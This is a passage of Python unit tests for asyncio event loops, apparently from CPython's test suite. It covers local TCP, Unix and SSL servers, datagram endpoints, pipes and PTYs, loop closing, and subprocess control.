@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@socket_helper.skip_unless_bind_unix_socket
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@socket_helper.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@socket_helper.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"IP address mismatch, certificate is not valid for "
"'127.0.0.1'"):
self.loop.run_until_complete(f_c)
# close connection
# transport is None because TLS ALERT aborted the handshake
self.assertIsNone(proto.transport)
server.close()
@socket_helper.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
self.loop.run_until_complete(proto.connected)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
self.loop.run_until_complete(proto.connected)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port),
peercert=test_utils.PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_create_server_sock(self):
proto = self.loop.create_future()
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertEqual(sock.fileno(), sock_ob.fileno())
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = self.loop.create_future()
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = socket_helper.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = self.loop.create_future()
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def _test_create_datagram_endpoint(self, local_addr, family):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=local_addr, family=family)
s_transport, server = self.loop.run_until_complete(coro)
sockname = s_transport.get_extra_info('sockname')
host, port = socket.getnameinfo(
sockname, socket.NI_NUMERICHOST|socket.NI_NUMERICSERV)
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
# received
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint(self):
self._test_create_datagram_endpoint(('127.0.0.1', 0), socket.AF_INET)
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_datagram_endpoint_ipv6(self):
self._test_create_datagram_endpoint(('::1', 0), socket.AF_INET6)
def test_create_datagram_endpoint_sock(self):
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except:
pass
else:
break
else:
self.fail('Can not create socket.')
f = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
async def connect():
t, p = await self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
# This test reproduces the issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024, encoding="utf-8")
async def connect():
read_transport, _ = await loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = await loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
@unittest.skipUnless(hasattr(os, 'openpty'), 'need os.openpty()')
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
async def connect():
t, p = await self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = socket.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
@unittest.skipUnless(hasattr(os, 'openpty'), 'need os.openpty()')
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
@unittest.skipUnless(hasattr(os, 'openpty'), 'need os.openpty()')
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=support.SHORT_TIMEOUT)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
def test_prompt_cancellation(self):
r, w = socket.socketpair()
r.setblocking(False)
f = self.loop.create_task(self.loop.sock_recv(r, 1))
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
async def main():
try:
self.loop.call_soon(f.cancel)
await f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = self.loop.create_task(main())
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
async def wait():
loop = self.loop
await asyncio.sleep(1e-2)
await asyncio.sleep(1e-4)
await asyncio.sleep(1e-6)
await asyncio.sleep(1e-8)
await asyncio.sleep(1e-10)
self.loop.run_until_complete(wait())
# The ideal number of call is 12, but on some platforms, the selector
# may sleep at little bit less than timeout depending on the resolution
# of the clock used by the kernel. Tolerate a few useless calls on
# these platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
async def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
async def test():
pass
func = lambda: False
coro = test()
self.addCleanup(coro.close)
# operation blocked when the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = self.loop.create_future()
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
# run_in_executor test is tricky: the method is a coroutine,
# but run_until_complete cannot be called on closed loop.
# Thus iterate once explicitly.
with self.assertRaises(RuntimeError):
it = self.loop.run_in_executor(None, func).__await__()
next(it)
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
# bpo-31034: Make sure that we get the default signal handler (killing
# the process). The parent process may have decided to ignore SIGHUP,
# and signal handlers are inherited.
old_handler = signal.signal(signal.SIGHUP, signal.SIG_DFL)
try:
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
